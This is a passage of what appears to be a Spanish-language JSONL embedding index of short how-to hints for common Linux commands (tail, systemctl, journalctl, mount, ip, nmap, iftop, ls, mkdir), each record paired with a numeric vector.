0.10319, -0.02316, -0.01244, 0.0071, -0.00089, 0.02837, 0.00067, -0.04262, -0.00796, -0.00849, -0.05052, -0.00903, 0.03151, -0.05575, 0.00874, -0.01645, -0.08299, 0.04661, -0.00287, 0.01149, 0.06297, -0.03037, -0.03313, -0.05347, -0.00186, 0.0433, -0.04902, 0.02252, 0.02002, 0.00793, -0.01343, -0.01655, 0.07141, -0.01578, -0.02929, 0.00598, -0.04046, -0.01611, 0.05018, 0.02169, -0.00926, -0.01556, -0.05568, 0.07194, 0.08735, 0.03593, -0.04024, 0.02896, 0.01892, -0.00805, 0.00199, 0.02456, 0.03416, -0.07927, -0.0095, 0.01318, -0.07017, -0.00236, 0.04705, -0.01892, 0.05677, -0.01663, 0.00122, 0.02629, 0.00496, -0.04823, -0.00853, 0.0563, -0.03318, -0.00782, 0.06947, -0.00651, -0.04861, 0.02406, 0.01213, -0.06881, -0.05783, -0.08013, 0.03225, -0.05539, 0.00393, -0.02372]} +{"tipo": "tarea", "herramienta": "tail", "perfil": "LINUX", "fichero": "tarea comun: tail", "texto": "Para ver los ultimos cambios de un fichero de log: usa tail. tail -f log sigue en vivo. tail -n 50 las ultimas 50 lineas.", "v": [0.1006, 0.00706, -0.11154, 0.09142, 0.05153, -0.11183, -0.09763, 0.02245, 0.12075, 0.07288, -0.04409, -0.16996, 0.0173, 0.11871, 0.04922, -0.06965, -0.05959, -0.035, 0.01314, -0.14274, -0.11424, 0.08872, -0.07009, -0.08826, 0.06115, 0.02, 0.03911, -0.00891, -0.18281, -0.02497, 0.07418, 0.07932, 0.1153, -0.11618, -0.02357, 0.07013, 0.02458, -0.07163, -0.05535, 0.07149, -0.07894, -0.06793, -0.03597, 0.02, 0.00925, -0.12089, -0.10877, 0.19785, 0.09206, -0.00643, 0.05449, 0.0432, 0.01464, 0.08543, 0.03631, -0.11467, 0.03153, -0.05915, 0.08384, -0.02199, -0.07192, 0.05035, 0.05522, 0.01602, 0.02269, -0.04397, 0.03943, -0.11465, 0.01503, 0.04655, 0.01289, 0.10671, 0.01037, -0.04842, -0.10826, 0.04847, 0.07116, -0.1214, 0.00151, 0.12195, -0.09902, -0.09716, -0.13908, 0.06203, -0.08466, -0.01176, -0.03251, -0.01176, -0.00475, -0.03843, -0.00911, 0.02282, 0.03308, -0.05196, 0.02908, 0.05672, -0.07588, -0.01551, -0.08196, -0.07878, 0.01503, 0.01409, 0.00039, 0.08878, 0.05033, 0.0337, -0.01006, -0.08972, 0.02804, 0.10346, 0.04694, -0.01577, 0.02461, -0.02067, -0.04807, 0.07809, -0.04053, 0.04181, 0.03555, -0.04138, -0.04835, 0.05488, 0.04116, 0.1321, -0.0315, -0.0786, -0.08393, 0.08379, 0.07169, -0.02266, -0.07414, 0.04892, -0.0924, -0.02656, 0.03803, 0.06237, 0.03514, 0.0783, -0.09828, 0.02685, -0.03338, 0.01782, -0.03465, 0.03591, 0.03387, -0.04615, -0.09556, -0.04048, -0.05767, -0.00835, 0.06738, 0.00678, -0.05528, 0.01971, 0.05206, -0.07064, -0.01696, 0.02267, 0.04931, 0.00573, 0.04515, -0.00987, -0.05329, -0.06374, -0.08681, -0.042, -0.07587, 0.01278, -0.01486, 0.00934, -0.01274, -0.02133, -0.08162, -0.07101, 0.09717, -0.02247, -0.02836, -0.02229, 0.08923, 0.00322, -0.01768, 0.01921, 0.0047, -0.12026, 0.03058, -0.06062, 0.05107, 0.06823, 0.01756, -0.00693, -0.05774, 0.04638, 0.03109, -0.01594, 0.02576, 0.03115, 0.01145, -0.01115, -0.00428, -0.05736, -0.07076, 0.03903, -0.02298, -0.06305, 0.02427, 0.00297, 0.06827, 0.03586, 0.06547, 0.0768, -0.02171, -0.06783, -0.02658, 0.02709, -0.02922, -0.11703, 0.00837, -0.00107, 0.08154, 0.04865, -0.00151, -0.01025, -0.01183, 0.02277, 0.03778, 0.02683, 0.00459, 0.00784, 0.03548, 0.00317, -0.04147, 0.06002, -0.01527, -0.0759, 0.11368, 0.02653, 0.02351, 0.00655, 0.02016, -0.03854, 0.02278, 0.09604, -0.05658, 0.05639, 0.02751, -0.07268, -0.07828, 0.05001, -0.02588, -0.05054, 0.02357, -0.06026, 0.02114, -0.08065, 0.044, -0.04604]} +{"tipo": "tarea", "herramienta": "systemctl", "perfil": "LINUX", "fichero": "tarea comun: systemctl", "texto": "Para ver los servicios del sistema: usa systemctl. systemctl status servicio. start/stop/restart para manejarlo.", "v": [0.1275, 0.03489, -0.1476, -0.1612, 0.02749, -0.15654, -0.11743, -0.13655, -0.06397, 0.02006, -0.23059, -0.14797, 0.04967, 0.00326, 0.04781, 0.00751, -0.0972, -0.00849, -0.00662, -0.08108, -0.11852, -0.03523, 0.02501, -0.04749, -0.10196, 0.11519, -0.00308, -0.19931, -0.20987, -0.04529, -0.01417, -0.02971, 0.07294, -0.10417, -0.04289, -0.04132, 0.0134, 0.13073, 0.02263, 0.12161, -0.01533, -0.00665, 0.07507, 0.07591, 0.09323, -0.08367, 0.05133, -0.03412, 0.02265, -0.04177, -0.04139, -0.02923, -0.14013, -0.02995, 0.04493, 0.03104, -0.00206, -0.02302, -0.08898, -0.08781, 0.00859, 0.03051, -0.02944, -0.0544, 0.10289, -0.0377, 0.01102, -0.08528, -0.03057, 0.10683, -0.0564, -0.02359, 0.09148, -0.01565, -0.02752, 0.02689, 0.06838, -0.02034, 0.09779, 0.06201, -0.06319, 0.06507, -0.08091, 0.08125, -0.01271, -0.06718, -0.05393, 0.06876, -0.03496, -0.08413, 0.09078, -0.00879, 0.00755, 0.07807, 0.03975, -0.01133, -0.03296, 0.05977, -0.06005, 0.00868, 0.08346, 0.00281, -0.01433, 0.12323, -0.04862, -0.11937, 0.08127, -0.03356, 0.00276, -0.02843, -0.02806, -0.03656, 0.04298, -0.06839, -0.04393, 0.01706, -0.05631, 0.00659, -0.01808, -0.01109, -0.04857, 0.02853, 0.08105, -0.05598, 0.07796, -0.04641, 0.04792, 0.03745, 0.10109, 0.08281, 0.04903, -0.00333, -0.08503, -0.02536, 0.04358, -0.02996, 0.013, 0.06891, -0.00078, -0.01668, 0.05346, 0.11216, -0.03287, -0.02927, 0.09648, -0.00323, 0.09526, -0.06643, 0.01366, -0.02358, -0.02845, 0.08464, -0.02325, -0.04245, -0.06398, -0.04636, 0.0401, -0.05814, 0.05428, 0.00346, 0.01071, -0.0337, 0.07111, 0.06188, -0.07809, -0.0033, 0.00551, -0.02737, 0.05525, -0.00214, -0.04923, 0.01474, 0.02258, -0.04093, 0.03056, -0.00847, -0.07397, -0.09605, 0.06247, 0.01649, -0.06783, 0.00124, 0.03953, 0.05402, -0.04566, 0.02366, -0.04945, 0.04119, -0.01494, 0.02587, 0.02334, 0.03731, -0.02887, 0.01184, 0.0638, 0.0134, -0.0627, -0.07588, -0.04688, 0.00673, -0.06683, 0.0484, 0.02413, -0.03855, -0.05279, 0.02673, 0.11312, 0.03745, 0.03661, 0.0861, 0.01218, 0.00315, 0.09999, 0.00415, -0.0548, 0.01199, -0.03937, -0.02847, -0.02149, -0.05083, 0.03255, 0.01742, -0.02766, 0.07626, -0.01581, -0.06702, -0.02546, 0.03302, 0.02709, -0.04089, -0.02194, -0.02898, 0.00359, -0.01915, -0.0119, -0.06578, 0.01076, -0.03765, -0.01806, -0.06672, 0.07622, 0.08003, 0.01142, -0.06284, -0.03207, -0.02613, -0.01453, -0.06389, -0.00428, -0.0204, 0.00082, 0.05235, -0.01456, -0.07967, 0.00044, -0.02698]} +{"tipo": "tarea", "herramienta": "journalctl", "perfil": "LINUX", "fichero": "tarea comun: journalctl", "texto": "Para ver los mensajes del sistema: usa journalctl. journalctl -xe lo reciente. journalctl -u servicio de un servicio.", "v": [0.0296, 0.08713, 0.02783, -0.08274, -0.00451, -0.17019, -0.07269, -0.11717, 0.0714, -0.02092, -0.11236, -0.0779, 0.07587, 0.02392, 0.02928, -0.01311, 0.06281, -0.00046, -0.06533, -0.0375, -0.08637, 0.00973, -0.05732, -0.01119, -0.1821, 0.07526, 0.00409, -0.12193, -0.04698, 0.01693, 0.01355, -0.04837, 0.11829, -0.09844, -0.04877, -0.00355, 0.07634, 0.1984, -0.13219, 0.12447, 0.00172, -0.09225, -0.0666, 0.03045, 0.02452, 0.02832, -0.03677, 0.06722, -0.07497, -0.04007, -0.03949, -0.01147, -0.1424, 0.11734, -0.01487, 0.02889, 0.04968, -0.01694, 0.02762, -0.10061, 0.02115, 0.11575, -0.03553, -0.0591, 0.09965, -0.11181, 0.06985, -0.12678, -0.13213, 0.04287, -0.02326, -0.01787, 0.08512, 0.0155, -0.06562, 0.01038, -0.08837, 0.0665, 0.01708, 0.03482, -0.01735, -0.04163, -0.04049, 0.05066, -0.02704, 0.00365, -0.00968, -0.00725, -0.11949, -0.00115, 0.11479, 0.01499, -0.11422, 0.13488, 0.08715, -0.04584, -0.08217, -0.01072, 0.01628, 0.04383, 0.13728, 0.00957, 0.01513, 0.01949, -0.03372, -0.06257, 0.03694, -0.02192, 0.05749, 0.06907, 0.02914, -0.04895, 0.07071, -0.03504, -0.07168, -0.00449, -0.05619, 0.04134, 0.02695, -0.10548, -0.0412, -0.01862, 0.10639, 0.04525, 0.01269, -0.08496, -0.03307, 0.05488, 0.06005, 0.04486, -0.00967, 0.07525, -0.07521, -0.02676, 0.00089, 0.0323, 0.05083, 0.08121, -0.05297, -0.0144, 0.00658, 0.08072, -0.05925, -0.01097, 0.05272, -0.04297, -0.0248, -0.09545, -0.08003, 0.03531, -0.00893, 0.07679, 0.03808, -0.03499, -0.00116, -0.06411, 0.06163, -0.10013, -0.04363, 0.00598, -0.04163, -0.03163, 0.07393, 0.07631, -0.05481, -0.04477, 0.0359, -0.02995, 0.05874, 0.00704, -0.02779, 0.01567, -0.01331, -0.07042, 0.07902, -0.02552, -0.02644, -0.00233, 0.05679, 0.00994, -0.04023, 0.05632, -0.0531, 0.01121, -0.02408, 0.0244, 0.00688, 0.01503, 0.04085, -0.00736, -0.00961, 0.0328, -0.04231, 0.00053, 0.0053, -0.02343, -0.064, -0.13695, 0.02533, -0.04273, -0.1444, -0.03717, 0.01123, -0.08043, -0.05925, 0.0134, 0.00815, 0.03313, -0.00266, 0.1203, 0.04807, -0.02098, 0.03845, -0.01557, -0.09814, 0.00557, 0.01485, -0.03267, -0.02258, 0.00575, 0.08527, -0.06297, 0.01203, -0.01703, -0.01019, 0.01373, 0.04539, 0.05747, 0.08015, 0.03565, -0.05414, 0.05975, -0.05047, 0.00818, 0.06227, 0.02124, 0.02024, -0.03984, -0.06098, -0.10761, 0.04071, 0.05418, -0.03322, 0.04096, -0.03122, -0.06801, -0.08492, 0.02506, -0.02929, -0.02641, 0.03333, 0.03756, 0.05009, -0.12929, 0.11631, -0.07648]} +{"tipo": "tarea", "herramienta": "mount", "perfil": "LINUX", "fichero": "tarea comun: mount", "texto": "Para montar un disco o usb: usa mount. mount /dev/sdX1 /mnt monta. lsblk lista los discos. umount desmonta.", "v": [0.087, -0.16371, -0.14199, 0.06325, -0.15805, 0.02461, -0.20757, -0.0668, -0.21893, -0.09949, -0.08399, -0.16211, 0.03424, -0.13602, -0.10141, -0.08206, 0.00649, -0.05199, -0.07633, -0.10842, 0.01433, -0.11255, 0.00927, -0.1016, 0.09255, 0.02834, -0.03857, -0.00066, -0.11537, 0.05696, 0.13904, 0.02603, -0.10876, -0.05343, 0.03469, -0.22873, 0.05414, -0.07779, 0.16498, 0.02229, -0.06292, 0.01882, -0.03114, 0.06899, -0.02472, -0.14089, 0.08716, 0.01629, -0.04544, 0.02171, 0.0956, 0.06412, -0.09732, 0.0424, -0.03031, -0.13003, 0.02174, 0.02604, 0.05825, 0.03605, -0.02575, 0.0823, -0.09354, 0.07168, 0.02946, 0.01425, 0.03517, -0.11718, -0.04436, -0.01164, -0.06975, -0.05059, 0.11867, -0.0175, -0.01938, 0.04924, 0.061, -0.04602, 0.00582, -0.03135, 0.00338, -0.03229, 0.03746, 0.06065, -0.16389, -0.09587, 0.04457, -0.00361, -0.03363, 0.02961, -0.00962, 0.02598, -0.03791, -0.0122, 0.05954, -0.06207, 0.04825, 0.23068, 0.02852, -0.03638, 0.04461, 0.08796, 0.03587, 0.04855, 0.04365, -0.02173, 0.07664, -0.09408, 0.03782, 0.04398, 0.10123, 0.04426, -0.08243, -0.02092, -0.10842, -0.07218, -0.03224, 0.03415, -0.04373, 0.05885, -0.01621, 0.09586, 0.00899, 0.05667, 0.01437, -0.01274, 0.11077, 0.03156, -0.05132, -0.00771, 0.04856, -0.03413, 0.0106, -0.00571, 0.035, 0.04855, 0.01121, 0.03863, -0.01363, -0.02855, 0.11381, 0.05352, -0.06452, -0.02115, 0.00799, 0.05301, -0.03289, -0.00336, -0.0047, 0.01614, 0.02445, 0.09981, 0.00412, -0.02937, 0.01992, -0.01371, 0.06911, -0.03495, 0.00629, 0.01522, 0.05404, 0.01916, 0.0063, 0.01945, -0.03177, 0.01158, 0.01704, -0.00774, 0.05157, 0.00583, 0.00436, 0.02248, 0.06112, -0.05314, 0.06693, -0.02992, -0.00524, -0.02667, 0.07119, 0.04448, 0.01986, 0.0379, 0.0071, -0.01464, -0.02355, -0.06005, 0.04464, -0.0205, 0.00423, -0.03996, 0.02511, -0.03327, -0.00148, -0.03446, 0.02721, -0.05917, -0.03625, -0.00138, -0.05341, 0.0152, -0.01208, -0.02988, -0.00828, -0.05497, 0.04834, -0.02966, -0.02577, 0.02851, -0.02424, 0.02196, 0.05836, -0.01381, -0.02654, 0.03433, -0.02708, -0.03895, -0.06135, 0.07093, -0.03315, 0.05564, -0.02038, -0.00091, 0.02559, -0.01208, -0.03096, 0.01555, 0.04802, 0.01055, 0.04733, 0.02486, -0.01054, 0.01662, -0.00599, -0.00954, 0.01542, 0.01277, 0.01618, 0.0242, -0.00681, -0.02481, 0.01918, 0.02317, -0.02288, -0.01999, -0.03994, -0.05435, -0.02748, 0.04637, 0.00911, -0.06964, 0.00508, -0.01414, -0.04906, -0.04306, 0.01954, -0.03687]} +{"tipo": "tarea", "herramienta": "ip", "perfil": "LINUX", "fichero": "tarea comun: ip", "texto": "Para ver la configuracion de red: usa ip. ip a las interfaces y sus IP. ip r la tabla de rutas.", "v": [0.11092, -0.08327, -0.16245, -0.11057, 0.18831, -0.2193, 0.09217, -0.10736, -0.07798, 0.07584, 0.0519, -0.162, 0.09237, -0.06011, -0.01469, 0.08114, -0.01665, 0.09189, 0.09224, -0.22683, -0.01959, 0.17133, -0.1317, 0.03808, -0.11363, 0.12722, -0.06671, -0.0003, -0.04114, -0.16436, -0.15709, -0.1138, -0.0261, -0.0698, -0.20616, -0.13247, 0.08231, 0.13108, 0.00935, 0.02245, -0.00651, 0.01804, -0.06054, 0.0113, 0.05485, 0.05118, 0.02618, -0.11049, -0.00306, -0.008, -0.12935, -0.13631, -0.00925, -0.05035, -0.10981, 0.03651, 0.04811, -0.08218, 0.01412, 0.05077, -0.01472, 0.05647, -0.09526, 0.02361, 0.05794, -0.03271, -0.12615, -0.05535, -0.02678, -0.03112, 0.07402, -0.01537, -0.07681, 0.01421, 0.09557, 0.04155, 0.01324, -0.03725, 0.11139, 0.00549, 0.00747, 0.0435, -0.16387, -0.03301, -0.09217, -0.03808, 0.05895, -0.09243, 0.02181, 0.00084, 0.00633, 0.01802, -0.00898, 0.01426, 0.05135, -0.05558, -0.02521, 0.0854, -0.00174, -0.04966, -1e-05, 0.09663, -0.1163, 0.06797, 0.10156, 0.07875, 0.04245, 0.01675, 0.03081, 0.04023, 0.0297, 0.03193, -0.02559, -0.05085, -0.00742, -0.02422, -0.00104, -0.00306, 0.00474, -0.02879, -0.00517, -0.01574, -0.03956, 0.0616, -0.03483, 0.0555, 0.00678, 0.05727, 0.03711, 0.02061, -0.01544, -0.07914, -0.02417, -0.05661, 0.03295, 0.02932, -0.02484, -0.02893, 0.00693, -0.00637, 0.04055, -0.00084, -0.07559, -0.0274, 0.07939, -0.01868, -0.01053, -0.07721, -0.01739, 0.03165, -0.00839, 0.04961, 0.01342, -0.00765, -0.03791, 0.08509, -0.01568, -0.04085, 0.00229, 0.05886, -0.03543, -0.00215, 0.01972, -0.02486, 0.02954, 0.06096, -0.08053, 0.05877, 0.13944, -0.06047, -0.02861, 0.03404, -0.01353, -0.05718, -0.04077, -0.0524, -0.00995, 0.00595, -0.00298, -0.03271, 0.01343, -0.0681, 0.01127, -0.00752, -0.01571, -0.02455, 0.03849, -0.00695, 0.00536, -0.03252, 0.05687, -0.01183, -0.04837, 0.0456, 0.07348, -0.02809, -0.02056, -0.0419, -0.05585, -0.02735, -0.03539, 0.00276, -0.00358, -0.02677, -0.01647, 0.02429, 0.03209, 8e-05, 0.00185, 0.01942, 0.04355, -0.01943, 0.00789, -0.02805, -0.05863, -0.00401, 0.02536, 0.03271, 0.03705, -0.01274, 0.01413, 0.04535, -0.03771, 0.00441, 0.00787, 0.01833, -0.00186, 0.00461, 0.0266, -0.00871, -0.03083, 0.03825, -0.01146, -0.03501, 0.03106, -0.03024, 0.01783, -0.02131, -0.00507, -0.02763, -0.01225, 0.02888, -0.00348, -0.01593, -0.02926, -0.02843, -0.07574, -0.02486, 0.001, -0.04218, -0.0177, -0.00798, 0.02438, -0.017, -0.02624, -0.00635]} +{"tipo": "tarea", "herramienta": "nmap", "perfil": "LINUX", "fichero": "tarea comun: nmap", "texto": "Para escanear una red o unos puertos: usa nmap. nmap -sV objetivo detecta servicios. nmap -p- todos los puertos.", "v": [0.21368, -0.15773, -0.11397, -0.15546, 0.02172, 0.03174, 0.06083, -0.15867, -0.18094, -0.0185, -0.07352, 0.00175, 0.11614, -0.03033, -0.13895, 0.01011, -0.11168, 0.05831, 0.13567, 0.11856, -0.11672, 0.01893, -0.07386, -0.0051, 0.04699, 0.16203, -0.04133, 0.03617, -0.05952, 0.0259, -0.01472, 0.0415, 0.04792, -0.09786, -0.02696, -0.08097, 0.0617, -0.10502, 0.13217, 0.12702, -0.0505, 0.10962, -0.05091, -0.05383, 0.1229, -0.07003, -0.06087, -0.01506, -0.02669, 0.00449, -0.04498, 0.08467, -0.18543, 0.02959, -0.08371, 0.00089, -0.04339, 0.04981, -0.01377, -0.0464, -0.03866, 0.08047, -0.0323, -0.12127, -0.03435, -0.09779, 0.00424, -0.06267, -0.06768, -0.0699, -0.02242, -0.04819, 0.06973, 0.02371, -0.00868, -0.0597, 0.00987, -0.02876, 0.10116, 0.0355, 0.05431, -0.03941, -0.14809, -0.08067, -0.04932, -0.09093, -0.02991, 0.03584, 0.02971, -0.07939, 0.09027, 0.0136, 0.02096, 0.10549, -0.03466, -0.02428, -0.05951, -0.01399, 0.00508, 0.03714, 0.09497, 0.09583, -0.09394, 0.04337, -0.02156, -0.00084, 0.0305, 0.03199, 0.12608, 0.04531, 0.17093, 0.01303, -0.02913, -0.09392, -0.03008, -0.0304, 0.02403, -0.06234, -0.03428, -0.03078, -0.04575, -0.07577, 0.03052, 0.04668, -0.04012, -0.01879, 0.0292, 0.04142, 0.07048, 0.08868, -0.03369, -0.02657, -0.03521, -0.00992, -0.00596, -0.00692, 0.00671, -0.11866, -0.03713, 0.0784, -0.09769, 0.02301, -0.08162, -0.02378, 0.02894, 0.01427, 0.03544, -0.03683, -0.00535, 0.01047, 0.05365, 0.04098, -0.09539, -0.06297, -0.00375, 0.09071, 0.08613, -0.04297, -0.05799, 0.08807, 0.0076, 0.00273, 0.03599, 0.0157, -0.00012, -0.02892, 0.01386, -0.01386, 0.07125, -0.06025, -0.00686, 0.05792, -0.0828, -0.08456, 0.06704, 0.02927, 0.00981, -0.06212, -0.01582, -0.02812, -0.03103, 0.03545, -0.02015, -0.01176, -0.09281, -0.08907, 0.00363, -0.06165, -0.02951, 0.0512, 0.05213, -0.02677, -0.00617, 0.01038, 0.01341, 0.01816, -0.02969, -0.02597, -0.01579, -0.04848, -0.00145, 0.04398, 0.03314, 0.00827, -0.02968, 0.00412, -0.02313, 0.0373, -0.03051, 0.0798, 0.0035, -0.00263, 0.04283, -0.03107, -0.03741, 0.0202, -0.02317, 0.03732, 0.03383, 0.02074, -0.02684, 0.07798, -0.01313, 0.07106, -0.03307, 0.0104, 0.04366, 0.01879, 0.03717, 0.01514, 0.02418, -0.00392, -0.04099, -0.03036, 0.00363, -0.00775, -0.00524, 0.02938, -0.00401, -0.03608, 0.04807, -0.03598, -0.02942, -0.02829, 0.03994, -0.08169, -0.00834, 0.05482, 0.02659, 0.02543, -0.0184, 0.02974, -0.03242, -0.07182, 0.02531, -0.01594]} +{"tipo": "tarea", "herramienta": "iftop", "perfil": "LINUX", "fichero": "tarea comun: iftop", "texto": "Para ver el uso de red en vivo: usa iftop. iftop o nload muestran el trafico en vivo.", "v": [0.00678, -0.05019, -0.27383, 0.02721, 0.02987, -0.00479, -0.0513, -0.08295, 0.08467, -0.12641, -0.1439, -0.33941, 0.03758, 0.09955, 0.04948, 0.02669, -0.03478, -0.02985, 0.16438, -0.08654, -0.01736, 0.01121, -0.12481, -0.06826, 0.05422, 0.1218, -0.03908, -0.09597, -0.12725, 0.0609, 0.06173, 0.02821, 0.02816, -0.04625, -0.04161, -0.02167, 0.08565, 0.02693, -0.00889, 0.11318, -0.01003, 0.03279, -0.05766, -0.05424, -0.01118, -0.03467, -0.01188, -0.06855, -0.10886, 0.023, 0.02911, 0.04874, -0.07401, -0.08593, -0.13629, -0.05757, -0.06556, -0.1321, 0.06158, 0.00608, 0.00868, 0.06289, 0.06867, 0.00368, -0.06652, -0.03948, -0.00175, -0.00335, -0.00019, 0.04297, 0.01766, 0.06694, 0.03606, 0.10451, -0.01772, 0.06513, 0.04067, -0.07936, 0.12296, 0.06763, 0.02816, 0.02234, -0.13387, 0.08146, -0.08822, -0.06432, 0.0682, 0.06849, 0.01642, 0.00793, 0.01048, -0.00032, 0.07112, 0.05172, 0.10437, -0.02536, -0.06249, -0.02229, 0.0805, -0.01986, 0.13075, 0.0373, -0.03086, -0.09521, 0.04085, 0.00882, 0.04716, -0.10961, -0.01019, -0.02849, 0.06657, -0.10697, -0.04818, -0.04685, -0.01684, 0.04311, -0.02128, 0.03252, 0.01931, -0.06098, -0.06627, 0.04845, 0.04494, -0.03472, 0.04166, 0.0141, -0.03398, 0.08608, 0.03382, 0.08504, -0.01991, -0.00609, 0.02548, -0.07737, 0.0156, -0.01873, 0.067, 0.03693, -0.03696, 0.00398, 0.02494, 0.07659, -0.11682, -0.08823, -0.02012, 0.01777, -0.09903, -0.02909, -0.03648, 0.05274, 0.00255, 0.01861, -0.03007, -0.04442, 0.05512, 0.01771, 0.00955, -0.02581, -0.03729, -0.04334, -0.02684, -0.00716, -0.02536, -0.00733, -0.10961, 0.08096, -0.04223, -0.00429, -0.02779, -0.01575, 0.00345, 0.01812, -0.03118, -0.03564, -0.01477, -0.05837, -0.04548, -0.04612, -0.01303, -0.05277, 0.007, 0.01923, -0.03427, 0.01122, -0.04605, -0.05059, -0.00409, 0.0789, -0.02096, 0.00061, 0.0142, 0.03803, 0.03282, 0.09732, 0.06526, 0.0783, 0.04117, -0.02198, -0.04044, -0.06992, -0.01034, -0.04599, 0.00424, 0.0053, 0.0661, -0.00183, -0.01686, 0.01882, 0.00915, 0.06463, -0.04898, 0.01155, 0.07245, -0.01203, -0.08019, 0.0022, 0.05428, -0.03202, 0.04403, 0.00603, 0.04797, -0.00042, -0.02595, 0.00388, 0.00932, 0.02632, -0.00496, -0.01103, 0.05286, 0.0052, -0.10242, 0.03645, 0.02513, 0.00881, 0.03758, -0.03238, 0.0575, 0.07394, -0.0364, -0.12715, 0.01504, 0.05583, -0.05618, -0.05861, 0.06848, 0.04718, -0.08953, 0.00237, 0.00618, -0.07585, 0.0346, -0.00468, -0.03761, -0.04931, 0.01615, -0.01432]} +{"tipo": "tarea", "herramienta": "ls", "perfil": "LINUX", "fichero": "tarea comun: ls", "texto": "Para cambiar de directorio y listar: usa ls. ls -la lista con detalles y ocultos. cd carpeta entra. pwd dice donde estas.", "v": [0.28602, -0.03923, -0.13957, 0.04962, -0.03161, -0.16183, 0.09019, 0.07619, -0.07663, -0.0363, -0.0102, -0.23192, -0.09083, -0.20225, -0.12277, -0.13574, 0.06788, 0.04709, 0.0764, -0.15991, 0.01819, 0.03328, -0.03338, -0.05066, -0.11159, 0.07156, 0.06935, -0.04322, -0.14742, 0.06502, -0.01114, 0.0657, -0.00874, -0.02228, -0.01554, 0.02307, 0.02333, -0.04111, 0.03058, 0.09855, -0.0356, 0.17948, -0.00701, 0.15401, 0.0172, -0.09421, 0.02968, 0.10199, 0.01713, 0.00329, -0.06384, -0.00349, -0.12748, -0.07746, 0.09331, -0.16228, 0.0076, 0.00707, 0.04074, 0.03822, 0.01235, 0.04887, -0.06635, 0.10089, -0.03582, 0.00254, -0.00456, -0.10773, -0.03813, 0.07361, -0.06835, 0.0277, 0.08659, -0.03563, -0.006, 0.00883, -0.0019, -0.09353, -0.08239, 0.01299, 0.00444, -0.00251, -0.01138, 0.03935, -0.02644, -0.1256, -0.00537, 0.00154, -0.05599, -0.02008, 0.05173, -0.01143, -0.07218, 0.08746, 0.08879, -0.04133, -0.00885, 0.06094, 0.02914, -0.05052, 0.07434, 0.02476, -0.11184, 0.12879, -0.03034, 0.08213, 0.01028, -0.00423, -0.03858, 0.03036, 0.08508, 0.02116, -0.02002, 0.0165, -0.03322, -0.01326, -0.0071, 0.01722, -0.01879, 0.02339, -0.12864, 0.00642, -0.06, 0.0415, 0.0251, 0.01306, -0.01111, 0.05374, -0.05248, 0.10457, -0.03773, 0.02323, -0.03414, -0.11153, -0.07118, 0.005, -0.05254, 0.06499, 0.01303, 0.04572, 0.04098, 0.01905, -0.03412, 0.03478, 0.03128, 0.01739, 0.10986, -0.01524, -0.03847, 0.0167, 0.02572, 0.0586, 0.05372, -0.05168, 0.09988, 0.04091, 0.08085, -0.03452, -0.00344, -0.03696, -0.02789, -0.03327, -0.00731, -0.02306, -0.03358, -0.00991, 0.02097, -0.02675, 0.03951, -0.06451, 0.02366, 0.02903, 0.00429, -0.04942, -0.0574, -0.01356, 0.07438, -0.03146, 0.03341, 0.04734, 0.03658, 0.06406, -0.01903, -0.00362, -0.02741, -0.02714, 0.01436, -0.05591, -0.05862, -0.01297, 0.02218, 0.02298, -0.01008, -0.00437, 0.00269, 0.01585, 0.04414, -0.04603, -0.04497, -0.06464, -0.0545, 0.01015, -0.00187, -0.07072, 0.04907, 0.01593, -0.0094, 0.04829, -0.0549, 0.02272, 0.07827, -0.05595, 0.05295, -0.02621, -0.04491, -0.01884, -0.04416, 0.07256, 0.00176, 0.004, 0.00148, 0.07679, 0.06014, -0.07269, 0.02503, 0.01271, 0.01733, 0.00954, 0.02864, 0.05186, -0.05032, 0.01174, -0.0003, -0.07481, 0.02879, 0.04609, -0.03345, 0.01625, -0.02679, -0.00186, 0.02065, 0.07067, -0.04537, -0.0314, -0.0351, -0.00861, -0.07186, 0.02286, 0.01575, -0.06231, -0.04877, -0.02919, 0.0131, -0.07284, 0.00463, -0.06475]} +{"tipo": "tarea", "herramienta": "mkdir", "perfil": "LINUX", "fichero": "tarea comun: mkdir", "texto": "Para crear una carpeta: usa mkdir. mkdir carpeta. mkdir -p a/b/c crea la ruta entera.", "v": [0.25588, -0.18004, -0.13127, 0.07452, 0.04102, -0.00376, -0.02478, 0.2444, -0.07732, -0.12611, -0.05931, -0.05412, 0.10398, -0.22831, -0.09045, 0.01637, -0.01542, -0.05431, 0.04868, -0.05692, 0.12105, -0.02131, 0.14552, 0.02189, -0.12506, 0.02159, 0.09873, 0.00685, -0.0481, -0.03119, -0.00335, 0.18198, -0.06058, -0.05138, 0.00665, -0.12548, 0.06091, -0.0713, -0.06537, 0.03128, -0.15806, 0.12804, -0.01532, 0.03238, 0.02594, -0.00855, 0.06404, -0.01964, -0.1087, 0.04851, -0.02764, 0.00245, -0.15372, 0.04379, 0.0387, -0.06238, 0.07546, -0.07409, 0.01447, 0.13121, -0.02605, 0.06048, -0.0528, 0.01664, 0.00106, -0.09714, 0.0991, -0.13424, -0.03458, 0.053, -0.0418, -0.03626, 0.08608, -0.03764, 0.00452, 0.01092, -0.05126, -0.02153, -0.02484, 0.00071, 0.04895, -0.02608, -0.09822, -0.0587, -0.01597, -0.07713, 0.10033, -0.00042, -0.05661, 0.00866, -0.0003, -0.05881, -0.08583, 0.00224, 0.03208, -0.07758, 0.00438, 0.02097, 0.03707, -0.05013, -0.0576, -0.00534, -0.11005, 0.11094, -0.03861, 0.02063, -0.01172, -0.00305, 0.02168, -0.01696, 0.11438, -0.00717, -0.04524, -0.00374, -0.05065, -0.04491, 0.00796, -0.00236, -0.06126, 0.00819, -0.06031, -0.01673, -0.03513, 0.05417, -0.02665, -0.01644, 0.0134, 0.05684, -0.07123, 0.07345, -0.05673, 0.02171, -0.06755, -0.08789, -0.06662, 0.07914, 0.00578, 0.02702, -0.01753, -0.02911, 0.03761, 0.03775, -0.06554, -0.00703, -0.01081, 0.10059, 0.04673, -0.13629, 0.01423, 0.01315, 0.00969, 0.08549, 0.01324, -0.05649, 0.06489, 0.04778, 0.04609, -0.02888, -0.06179, 0.06912, -0.01316, -0.00561, 0.01442, 0.01071, 0.01362, -0.08183, -0.0294, 0.00217, 0.02344, -0.01369, -0.01762, 0.0182, 0.00969, -0.06084, 0.05357, -0.05655, 0.03799, -0.10131, 0.04476, 0.01241, -0.00492, -0.00872, 0.00896, -0.02497, -0.05828, -0.06412, 0.04931, -0.0244, -0.0025, -0.038, 0.00898, 0.0696, 0.02089, -0.01639, -0.02543, 0.01113, -0.00811, -0.10051, 0.00632, 0.00017, -0.09745, -0.00235, 0.01898, -0.06364, 0.07162, 0.02156, -0.01568, 0.05394, -0.04726, 0.0673, 0.05262, -0.07484, 